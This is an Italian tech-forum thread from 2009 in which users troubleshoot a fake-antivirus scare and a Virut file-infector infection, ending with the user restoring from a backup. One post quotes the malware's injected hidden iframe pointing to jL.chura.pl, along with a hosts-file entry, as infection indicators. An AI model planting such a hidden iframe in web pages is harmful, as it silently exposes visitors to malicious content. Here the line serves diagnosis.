Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Test ride Can-Am Origin: la moto elettrica che fa dimenticare il motore a scoppio (ma occhio all'autonomia)
Test ride Can-Am Origin: la moto elettrica che fa dimenticare il motore a scoppio (ma occhio all'autonomia)
Abbiamo provato per una settimana intera la Can-Am Origin, la Dual Sport elettrica del gruppo canadese BRP: ecco com'è andata tra città, autostrada e un primo assaggio di sterrato
Logitech G325, G305 e G316 X: il tris per chi non vuole rinunciare a nulla, spendendo poco
Logitech G325, G305 e G316 X: il tris per chi non vuole rinunciare a nulla, spendendo poco
Nelle ultime settimane abbiamo provato il mouse Logitech G305, la tastiera G316 X 98 e le cuffie G325. Si tratta del setup entry-level di Logitech che ormai, di "entry-level" ha ben poco. Tastiera e mouse offrono prestazioni di livello competitivo con quasi nessuna rinuncia e un livello di personalizzazione estremamente elevato. Le cuffie, invece, hanno mostrato qualche debolezza, ma propongono un ventaglio di funzionalità completo che consente di abbandonare completamente i cavi
Recensione POCO F9 pro: potenza da vero top di gamma, display da 185 Hz e finalmente una fotocamera da prendere sul serio
Recensione POCO F9 pro: potenza da vero top di gamma, display da 185 Hz e finalmente una fotocamera da prendere sul serio
POCO F9 Pro arriva sul mercato con l'obiettivo di portare prestazioni da smartphone top di gamma in una fascia di prezzo "più aggressiva", senza rinunciare a un comparto fotografico finalmente all'altezza. Dopo averlo testato sul campo, emerge uno smartphone molto più completo rispetto alla generazione precedente, ma anche con alcuni piccoli compromessi che diventano difficili da ignorare quando il prezzo di listino sfiora i 1.000 euro.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 30-11-2009, 11:44   #1
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Caso disperato?

Sabato si apre la finestra di Secure Antivirus Pro dicendomi che il mio pc è infetto.

Seguo le istruzioni di "Guida alla disinfezione" e per tutti i file *.exe mi viene segnalato che sono infetti e pertanto non parte nulla.

Sembra che l'unica cosa che funziana sia Firefox.

Ho provato a downloadare pgm per la rilevazione/rimozione. Tutto OK in fase di download ma, quando clicco per installare, mi viene segnalato che è infetto.

Ho provato a scaricarlo da altro pc sulla chiavetta, ma quando richiamo l'installazione mi dice che il file sulla chiavetta è infetto.

Ho provato con i programmi che non necessitano di installazione, ma evidentemente qualcosa installano lo stesso, è mi dice che è infetto.

Ho provato a rimetterlo in rete con l'altro pc (controllato e pulito) e far partire l'installazione mi dice che è infetto.

La cosa strana è che sul pc infetto sono installati dei programmi che, dall'altro pc partono con un link, ebbene se parto con il pc infetto mi dice che il programma è infetto, se parto con il link dall'altro pc funziona tutto.

Cosa posso fare?
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 11:49   #2
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Ciao e benvenuto, tutti gli .*exe sono percaso infetti da Virut?
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 12:17   #3
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Si Chill-Out.
Almeno così mi dice l'avviso.
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 12:49   #4
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
Quote:
Originariamente inviato da dore2009 Guarda i messaggi
Si Chill-Out.
Almeno così mi dice l'avviso.
potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 14:52   #5
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 22:48   #6
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
Quote:
Originariamente inviato da dore2009 Guarda i messaggi
Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli
grazie, ricevuti
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 01-12-2009, 09:34   #7
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
...presumo una variante della versione diffusa tra 2008 e prima meta' 2009

Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 01-12-2009, 12:49   #8
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
Quote:
Originariamente inviato da 12pippopluto34 Guarda i messaggi
Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)
ciao

stai ancora cercando di ripulire o hai già preferito formattare?
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 13:46   #9
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
ciao

stai ancora cercando di ripulire o hai già preferito formattare?
Ciao.

No, ancora non ci ho messo le mani, in quanto comunque, pur messa cosi', la macchina funziona perfettamente; pero', stando cosi' le cose, penso che la formattero' quanto prima.

Rimango comunque in attesa, perche' il ripristino di quel pc per me sarebbe alquanto laborioso ed avrei anche pochissimo tempo a disposizione.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 14:54   #10
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
se non hai tempo da perdere meglio formattare in questo caso
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 15:01   #11
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
se non hai tempo da perdere meglio formattare in questo caso
Il problema e' che per intervenire via software posso solamente farlo al max da "Modalita Provvisiona con Rete", perche' dall'altra parte non ho qualcuno che possa usare strumenti come live-cd vari consentendomi di controllare da remoto la macchina; piu' che altro poi avrei proprio poco tempo per formattare e ripristinare tutta la configurazione del pc, per cui se c'e' una soluzione fattibile via VNC senza dover avere a portata di mano cdrom di avvio e/o di ripristino e quant'altro, potrei anche intervenire.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 15:26   #12
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 00:27   #13
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile
Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 01:39   #14
eraser
Senior Member
 
L'Avatar di eraser
 
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6395
Quote:
Originariamente inviato da 12pippopluto34 Guarda i messaggi
Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.
Qualsiasi file infector mantiene (o teoricamente dovrebbe, salvo poi corrompere il file per del codice scritto male) il file infetto funzionante. Ciò non significa però che sia facile poi riuscire a scindere il codice del virus da quello del file ospite
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio ::
eraser è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 01:40   #15
eraser
Senior Member
 
L'Avatar di eraser
 
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6395
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc
Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio ::
eraser è offline   Rispondi citando il messaggio o parte di esso
Old 04-12-2009, 14:50   #16
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Quote:
Originariamente inviato da eraser Guarda i messaggi
Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno
Ho risolto facendo il restore del disco backuppato 2 giorni prima su un HD formattato.
Grazie lo stesso.
dore2009 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Test ride Can-Am Origin: la moto elettrica che fa dimenticare il motore a scoppio (ma occhio all'autonomia) Test ride Can-Am Origin: la moto elettrica che f...
Logitech G325, G305 e G316 X: il tris per chi non vuole rinunciare a nulla, spendendo poco Logitech G325, G305 e G316 X: il tris per chi no...
Recensione POCO F9 pro: potenza da vero top di gamma, display da 185 Hz e finalmente una fotocamera da prendere sul serio Recensione POCO F9 pro: potenza da vero top di g...
Tra audio e AI: la ricetta di Qualcomm per l'agentic AI Tra audio e AI: la ricetta di Qualcomm per l'age...
Qualcomm annuncia la nuova generazione di SoC Snapdragon 8 Elite Gen 6 Qualcomm annuncia la nuova generazione di SoC Sn...
HEO Space ha rilasciato una nuova immagi...
La missione Artemis III sarebbe in ritar...
Apple apre Music Hall, una sala concerto...
Adobe arriva su Gemini e Claude: nuove f...
Non solo Fideuram: quasi 2 milioni di it...
I lettori CD di fascia alta potrebbero s...
Tutto il meglio di Amazon weekend: 5 nov...
Proscenic P15+ a 113€ su Amazon: scopa e...
TP-Link Wi-Fi 6 a 59,99€ e Tenda 4G03 Pr...
Un quasi top di gamma a 461€: lo smartph...
Roborock Saros 20 Neo e Flow Complete: 3...
Mac mini si trasforma: chip a 2 nanometr...
Su Amazon c'è un super TV Samsung...
La Cina ha rilasciato un satellite dallo...
Il satellite LINK è rientrato nel...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 22:44.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v